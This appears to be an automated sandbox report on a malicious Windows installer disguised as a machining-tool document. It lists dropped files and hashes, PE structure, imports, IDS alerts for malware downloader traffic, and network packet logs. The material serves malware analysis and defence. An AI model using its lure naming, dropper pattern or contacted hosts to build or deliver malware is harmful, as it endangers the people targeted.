                                                                                                                                                                                                                        MD5:43C93BE687DF1FEADFB2875C59B2B0C6
                                                                                                                                                                                                                        SHA1:B73BCF95842F90A848E9ED8E93B16DD2C65342CA
                                                                                                                                                                                                                        SHA-256:182B621DBE6D3C8DA69DFEAB3D669EF39583CDD08924B8FB40D4D8C66CAF0ED7
                                                                                                                                                                                                                        SHA-512:491F384F93AECB7553D33FCE4EE576D9E44B6981202AF648C3369449F76568A87DE1B466904FE370C8721AA509EBF42236C8EA126AD3F88C24B3372A0F041A36
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:..................................................................................L........................................................................U....................................................................................................................J.....................!.................................M...n.............................................j....{........................~.................................l..s........................................R.............*.{......sl.......................9.....m...............p...........................r............h...........$...................q.............................R.................................................................q..........................................................................b..........:..................._.........................................................................................................................B........................e.......~.............

                                                                                                                                                                                                                        C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs\Stures.ped

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):402098
                                                                                                                                                                                                                        Entropy (8bit):1.2523065426009072
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:ADeNhGs9RZUw+t2FRLS3kHxI5Sgm5tKOqSDKljjuss7LkXRnxTOx1wMZSYS4t7es:9tPgCZeaweSFE6+0ORTiYpkDj5n25
                                                                                                                                                                                                                        MD5:26D18C98FC2BBDDCC2EABECE2B7B7F7A
                                                                                                                                                                                                                        SHA1:B4B1E5A647D978FE16FCDCA2CEF87D526692E5CA
                                                                                                                                                                                                                        SHA-256:384AB607C9DE2127413622AB57F6B7415CEE138009B9EC333CF7A3564770F33F
                                                                                                                                                                                                                        SHA-512:E23E0CEEDBFF28B216C66BBCABE3422D63DAA48576E9C74C230FB728C3639B3A43324DA765D5B9A65428BDB4D420BDC9FEAB97CE2F63A6849F8B54BEEAE2AFCD
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:..EX......................................................................3..................................9..................................................z....,................8...........=...........................O........................Y............................................C...................................:..............4............. ...................................................|...............,...............v.............................................................2.........................................F............................_.................................x...................!..........................................\...........I.......!.......................'...z...............................................U......]...........................................................................................................(....M.....................................................................C1.....2...........I$...............O......

                                                                                                                                                                                                                        C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs\anchorets.ndr

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):262145
                                                                                                                                                                                                                        Entropy (8bit):1.2496109964873419
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:9XbhQfa5JLTv4IpFOrnxsCbpcSmgnKRYbfROeHfGA3hqDwfO7vpbWckbUvdb+FKd:9rzGxUsfSpdQmXLfWi80/APsuZnHaec
                                                                                                                                                                                                                        MD5:D307E67597944CE2EF28F2327B44806A
                                                                                                                                                                                                                        SHA1:54088A21AC7AD116A026AFDDAD56EBA053AECEA8
                                                                                                                                                                                                                        SHA-256:1D24BA37A824DFD8634735D26A476D5D373D1957C87649CB6F13AE4A80E4BD6C
                                                                                                                                                                                                                        SHA-512:8E6A019FBD15F36B38249108413CF669E1F5FFB3B49677877356C2EB45C4F2E04CB1509ADD33483AE1D84D14E83AA108AD0672F208DC683C2B1DFA2C94841B18
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.............................y.........................)...........&...sS...=........g.Q............... ........;....................................................................*.................................8......................o.....X....Wo.6........2............................2..................;...............................................................9...........................................1............R.~.......................................................b............................m.....................................f..........4.........h................M............................................(............................................................j7.....1......4.......6.=Q...........................q............................................................]...........................}................J..........................................................:.r.........................................l....S.................................

                                                                                                                                                                                                                        C:\Users\user\falden\myotonias\nonvoting\Kontrakttillgs\degelatinize.juv

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        File Type:DIY-Thermocam raw data (Lepton 2.x), scale 56-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 140075391325219348865385704194048.000000
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):392910
                                                                                                                                                                                                                        Entropy (8bit):1.243713183340455
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:Q4/fVNwA7vKgOXpUUQ4Bm6OwhTAQc3uRQJK:QAffweOOUc6/zHRQJK
                                                                                                                                                                                                                        MD5:4152ABE0E93A89EDDEA6AD43943D345D
                                                                                                                                                                                                                        SHA1:97D61B7F616EFF3894F98CD1167EDE0C4484E969
                                                                                                                                                                                                                        SHA-256:FE2499BAC94D1E864A127D1C923EAA55CDD7DB247A65765D4024EE65EE2F191B
                                                                                                                                                                                                                        SHA-512:01B4F62EDBFEF0A1AD17DF2840F33FDF3F6858FD06BC2C50EBDB41AC4A9FAD3D9933048BEFEE6B942950C08D17D809369591F120F0D8CDEDDDCB4C9487C3F5D1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:..................r...../........................p...............................................:...............................................W../.................y..........................k......................................................................................).................................................................. .......)................................g..............................................R..............V.......................................~.......................................h.......................Q..........U........^3............................................................................................................"........................................~....................=.......................................................................t.........................................................................................y..........-...........................................................y..........."........

                                                                                                                                                                                                                        C:\Users\user\hanknsordet.ini

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):32
                                                                                                                                                                                                                        Entropy (8bit):4.077819531114783
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:4l4CQ2AXL0ZTXP:L7XAp
                                                                                                                                                                                                                        MD5:1D4E67719C03DEEB154AE09EB4797083
                                                                                                                                                                                                                        SHA1:2EAE1079FF7B056433C03C58924E7BE9D5495F17
                                                                                                                                                                                                                        SHA-256:3CB1718228362F66F2B4EA524B73BBF80CBB98813393F40E32005E47E698FB76
                                                                                                                                                                                                                        SHA-512:5D7A984CEF4142B488E2E646F0CF5CA9602D5C97E184679D598C925F551DAC1A1CCB37D42A64FCD0B8AE77A3F7EA7874C538B606E5532FB4450F196D67917FCF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:[sharkskin]..tutorerne=slagvrk..

                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                        Entropy (8bit):7.615916322787091
                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                        File name:SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
                                                                                                                                                                                                                        File size:751'715 bytes
                                                                                                                                                                                                                        MD5:e7ebd3de4bcba42feee0d2bd98521920
                                                                                                                                                                                                                        SHA1:71608b8fd542467e554766de37cdc8244c84286f
                                                                                                                                                                                                                        SHA256:383d758b111ebf7255078b12d04f9f0e39ea4f85733563344754cbaad4bf0581
                                                                                                                                                                                                                        SHA512:8810494095ec08538084adc8c788795fa864c8d14a3cb764f6eb31164911c007b1a1c4faec69426dcf348ad9cc9ca38a786376ad9a5d2ee3b527c50588ab2c32
                                                                                                                                                                                                                        SSDEEP:12288:OLAv+r2OUwOGrtWhAefluH10OkBUEdJ240xvahGuY6o/iv6kqYd/l7EsEh32vA6:gK+y7wOOtzeA0hp9uYGP/6DzvA6
                                                                                                                                                                                                                        TLSH:42F402C2A5859847CD7649300077CA30D27B9E076DB3FA13EA8C7B1F59BB485EE26217
                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...p..V.................^...........0.......p....@

                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                        Icon Hash:1746c2f0dc48710f

                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Entrypoint:0x4030d9
                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                        Time Stamp:0x567F8470 [Sun Dec 27 06:25:52 2015 UTC]
                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                        Import Hash:076b06e6a65c9b7cca5a61be0cd82165

                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                        sub esp, 00000184h
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                        xor ebx, ebx
                                                                                                                                                                                                                        push 00008001h
                                                                                                                                                                                                                        mov dword ptr [esp+18h], ebx
                                                                                                                                                                                                                        mov dword ptr [esp+10h], 004091B0h
                                                                                                                                                                                                                        mov dword ptr [esp+20h], ebx
                                                                                                                                                                                                                        mov byte ptr [esp+14h], 00000020h
                                                                                                                                                                                                                        call dword ptr [004070A4h]
                                                                                                                                                                                                                        call dword ptr [004070A0h]
                                                                                                                                                                                                                        cmp ax, 00000006h
                                                                                                                                                                                                                        je 00007F603C50DD73h
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        call 00007F603C510CE1h
                                                                                                                                                                                                                        cmp eax, ebx
                                                                                                                                                                                                                        je 00007F603C50DD69h
                                                                                                                                                                                                                        push 00000C00h
                                                                                                                                                                                                                        call eax
                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                        push 004091A8h
                                                                                                                                                                                                                        call 00007F603C510C61h
                                                                                                                                                                                                                        push 004091A0h
                                                                                                                                                                                                                        call 00007F603C510C57h
                                                                                                                                                                                                                        push 00409194h
                                                                                                                                                                                                                        call 00007F603C510C4Dh
                                                                                                                                                                                                                        push 00000009h
                                                                                                                                                                                                                        call 00007F603C510CB0h
                                                                                                                                                                                                                        push 00000007h
                                                                                                                                                                                                                        call 00007F603C510CA9h
                                                                                                                                                                                                                        mov dword ptr [00423724h], eax
                                                                                                                                                                                                                        call dword ptr [0040703Ch]
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        call dword ptr [0040728Ch]
                                                                                                                                                                                                                        mov dword ptr [004237D8h], eax
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                        push 00000160h
                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        push 0041ECE0h
                                                                                                                                                                                                                        call dword ptr [00407178h]
                                                                                                                                                                                                                        push 00409188h
                                                                                                                                                                                                                        push 00422F20h
                                                                                                                                                                                                                        call 00007F603C5108D7h
                                                                                                                                                                                                                        call dword ptr [0040709Ch]
                                                                                                                                                                                                                        mov ebp, 00429000h
                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                        call 00007F603C5108C5h
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        call dword ptr [00000058h]

                                                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x73e00xa0.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x28508.rsrc
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x29c.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                        .text0x10000x5c5b0x5e0025f20353ff4dab35a62d1661fd51d448False0.6599900265957447data6.415883806471021IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .rdata0x70000x12120x1400a99dc6e1e9123b9d8eb17a3b16908620False0.4169921875data4.933902523070607IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .data0x90000x1a8180x400c329e2dbf8e92aedf63262846de2292bFalse0.6552734375data5.219575463223351IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .ndata0x240000x140000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                        .rsrc0x380000x285080x28600a5b741781fc5c5e9c569b8d2b900f19dFalse0.48313540054179566data5.130724634591061IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                        RT_ICON0x383580x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.3915621672778895
                                                                                                                                                                                                                        RT_ICON0x48b800x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.5436462055917595
                                                                                                                                                                                                                        RT_ICON0x520280x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.5700554528650646
                                                                                                                                                                                                                        RT_ICON0x574b00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.5252716107699575
                                                                                                                                                                                                                        RT_ICON0x5b6d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.6100622406639005
                                                                                                                                                                                                                        RT_ICON0x5dc800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5961538461538461
                                                                                                                                                                                                                        RT_ICON0x5ed280x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6409836065573771
                                                                                                                                                                                                                        RT_ICON0x5f6b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6826241134751773
                                                                                                                                                                                                                        RT_DIALOG0x5fb180x120dataEnglishUnited States0.5138888888888888
                                                                                                                                                                                                                        RT_DIALOG0x5fc380x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                        RT_DIALOG0x5fd580xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                                                                                        RT_DIALOG0x5fe200x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                        RT_GROUP_ICON0x5fe800x76dataEnglishUnited States0.7457627118644068
                                                                                                                                                                                                                        RT_VERSION0x5fef80x2ccdataEnglishUnited States0.48463687150837986
                                                                                                                                                                                                                        RT_MANIFEST0x601c80x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447

                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                        KERNEL32.dllSleep, SetFileAttributesA, GetFileAttributesA, GetTickCount, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileSize, ExitProcess, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrlenA, lstrcpynA, ExpandEnvironmentStringsA, SetEnvironmentVariableA, GetFullPathNameA, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, GetProcAddress, lstrcmpiA, lstrcmpA, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, CloseHandle, SetFileTime, GlobalLock, GetDiskFreeSpaceA, GlobalUnlock, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, MulDiv, WritePrivateProfileStringA, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                                                                                                                                                                        USER32.dllGetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, ScreenToClient, GetWindowRect, GetDlgItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetWindowLongA, SetForegroundWindow, ShowWindow, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
                                                                                                                                                                                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                                                                                                                                                        ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                                                                                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                        ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                        2024-10-07T10:56:09.869120+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049708142.250.80.46443TCP
                                                                                                                                                                                                                        2024-10-07T10:56:14.425508+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.2049710132.226.247.7380TCP
                                                                                                                                                                                                                        2024-10-07T10:56:16.081455+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.2049710132.226.247.7380TCP
                                                                                                                                                                                                                        2024-10-07T10:56:16.470754+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.2049712172.67.177.134443TCP
                                                                                                                                                                                                                        2024-10-07T10:56:16.721927+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.2049710132.226.247.7380TCP
                                                                                                                                                                                                                        2024-10-07T10:56:17.118729+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.2049713172.67.177.134443TCP
                                                                                                                                                                                                                        2024-10-07T10:56:17.378031+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.2049710132.226.247.7380TCP
                                                                                                                                                                                                                        2024-10-07T10:56:17.760474+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.2049714172.67.177.134443TCP
                                                                                                                                                                                                                        2024-10-07T10:56:18.018459+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.2049710132.226.247.7380TCP
                                                                                                                                                                                                                        2024-10-07T10:56:18.404606+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.2049715172.67.177.134443TCP
                                                                                                                                                                                                                        2024-10-07T10:56:18.658962+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.2049710132.226.247.7380TCP
                                                                                                                                                                                                                        2024-10-07T10:56:19.047470+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.2049716172.67.177.134443TCP
                                                                                                                                                                                                                        2024-10-07T10:56:19.315074+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.2049710132.226.247.7380TCP
                                                                                                                                                                                                                        2024-10-07T10:56:19.699159+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.2049717172.67.177.134443TCP
                                                                                                                                                                                                                        2024-10-07T10:56:19.955526+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.2049710132.226.247.7380TCP
                                                                                                                                                                                                                        2024-10-07T10:56:20.346164+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.2049718172.67.177.134443TCP
                                                                                                                                                                                                                        2024-10-07T10:56:20.596114+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.2049710132.226.247.7380TCP
                                                                                                                                                                                                                        2024-10-07T10:56:20.989727+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.2049719172.67.177.134443TCP

                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.359340906 CEST49708443192.168.11.20142.250.80.46
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.359477043 CEST44349708142.250.80.46192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.359678984 CEST49708443192.168.11.20142.250.80.46
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.385471106 CEST49708443192.168.11.20142.250.80.46
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.385516882 CEST44349708142.250.80.46192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.643665075 CEST44349708142.250.80.46192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.643893003 CEST49708443192.168.11.20142.250.80.46
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.643937111 CEST49708443192.168.11.20142.250.80.46
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.646564007 CEST44349708142.250.80.46192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.646775961 CEST49708443192.168.11.20142.250.80.46
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.697648048 CEST49708443192.168.11.20142.250.80.46
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.697694063 CEST44349708142.250.80.46192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.698412895 CEST44349708142.250.80.46192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.698638916 CEST49708443192.168.11.20142.250.80.46
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.700681925 CEST49708443192.168.11.20142.250.80.46
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.744251013 CEST44349708142.250.80.46192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.869213104 CEST44349708142.250.80.46192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.869555950 CEST44349708142.250.80.46192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.869735003 CEST49708443192.168.11.20142.250.80.46
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.869923115 CEST49708443192.168.11.20142.250.80.46
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.870588064 CEST49708443192.168.11.20142.250.80.46
                                                                                                                                                                                                                        Oct 7, 2024 10:56:09.870645046 CEST44349708142.250.80.46192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:10.020535946 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:10.020632029 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:10.020838976 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:10.021039963 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:10.021101952 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:10.262322903 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:10.262563944 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:10.265997887 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:10.266012907 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:10.266283035 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:10.266390085 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:10.266937017 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:10.308274984 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.444602013 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.444868088 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.460496902 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.460702896 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.460702896 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.460763931 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.468422890 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.468605995 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.468605995 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.476377964 CEST44349709142.250.65.225192.168.11.20
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.476491928 CEST49709443192.168.11.20142.250.65.225
                                                                                                                                                                                                                        Oct 7, 2024 10:56:12.476502895 CEST44349709142.250.65.225192.168.11.20
